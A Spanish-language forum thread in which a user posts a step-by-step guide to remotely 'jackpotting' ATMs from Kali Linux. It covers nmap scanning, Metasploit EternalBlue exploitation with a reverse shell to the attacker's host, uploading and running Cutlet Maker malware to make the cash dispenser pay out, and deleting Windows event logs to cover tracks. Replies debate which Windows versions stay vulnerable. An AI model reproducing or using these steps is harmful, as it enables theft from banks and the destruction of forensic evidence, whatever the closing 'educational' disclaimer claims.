JackPotting Remoto con Kali Linux


templarioactivoMAX

Alcalde de Alcafrán
Noder
HAGO ESTA GUÍA DE JACKPOTTING BASADO EN EL HILO DE JACKPOTTING QUE YA HAY PUBLICADO (tengo que editarlo y poner aquí el enlace). Espero que les guste.



•Guía de JackPotting Remoto con Kali Linux.
Escaneo de Red:

nmap -sS -p- --open -T4 -A -v (IP DONDE VAS ATACAR).
Identificar el cajero en la red y los servicios que están corriendo. El puerto 3389 (RDP) o 445 (SMB) es donde empiezan las buenas noticias.

Escaneo de vulnerabilidades:
nmap --script smb-vuln-ms17-010 -p445 (IP DONDE VAS ATACAR)
Si el cajero responde con vulnerabilidad al MS17-010, Tienes una forma de meter tu payload remotamente.

Abre Metasploit en Kali:
msfconsole

Configura el exploit EternalBlue:
use exploit/windows/smb/ms17_010_eternalblue

Ajusta las opciones:
set RHOSTS (IP VÍCTIMA) # IP del cajero
set LHOST your_kali_ip # Tu IP para recibir la conexión
set LPORT 4444 # El puerto que usarás

Dispara el exploit:
exploit
Instalar el Malware de JACKPOTTING (Cutlet Maker)
Sube Cutlet Maker a través de Meterpreter:
upload /ruta/del/cutlet_maker.exe C:\\Windows\\Temp\\cutlet_maker.exe
Ejecuta el malware:
execute -f C:\\Windows\\Temp\\cutlet_maker.exe
Cutlet Maker te pedirá un código de autorización que puedes generar usando otra herramienta que viene con el paquete, llamada c0decalc. Usa eso para generar el código y podrás acceder al panel de control del malware.

💰Extraer el Dinero💰
Con Cutlet Maker corriendo en el cajero, ahora puedes controlar directamente el dispensador de billetes. Aquí es cuando el cajero empieza a vomitar el dinero, jackpot estilo Las Vegas. Normalmente, tendrás que estar cerca del cajero para recoger el efectivo o tener a alguien allí haciendo el trabajo.
Cubrir tus Huellas

Eliminar el malware:
rm C:\\Windows\\Temp\\cutlet_maker.exe

Borrar logs:
del C:\\Windows\\System32\\winevt\\Logs\\*.evtx

Recuerda: hackear es un arte, no un crimen. TODO ESTO ES INFORMACIÓN EDUCATIVA y no me haré responsable de su uso. Gracias por su tiempo.🎩
 

mathuerso

Miembro muy activo
Noder
Buen aporte. Ahora, ya se complica encontrar sistemas con eternalblue, ahora si lo encuentras se caen las babas.
 

templarioactivoMAX

Alcalde de Alcafrán
Noder
Buen aporte. Ahora, ya se complica encontrar sistemas con eternalblue, ahora si lo encuentras se caen las babas.
Las versiones de Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8.1, Windows Server 2012 y Windows Server 2012 R2, Windows RT 8.1, Windows 10 y Windows Server 2016 son vulnerables al exploit EternalBlue.
 

mathuerso

Miembro muy activo
Noder
Las versiones de Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8.1, Windows Server 2012 y Windows Server 2012 R2, Windows RT 8.1, Windows 10 y Windows Server 2016 son vulnerables al exploit EternalBlue.
Yaa se que son vulnerables, pero se da cuando el SMBv1 de firma esta activado. Y ya cualquier actualización de windows te instala el KB que hace pasarte a SMBv2 por lo que ya no es vulnerable a MS17-010
 

mathuerso

Miembro muy activo
Noder
No solo por ser Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8.1, Windows Server 2012 y Windows Server 2012 R2, Windows RT 8.1, Windows 10 y Windows Server 2016, son vulnerables a eternalblue.
 
  • Like
Reacciones : templarioactivoMAX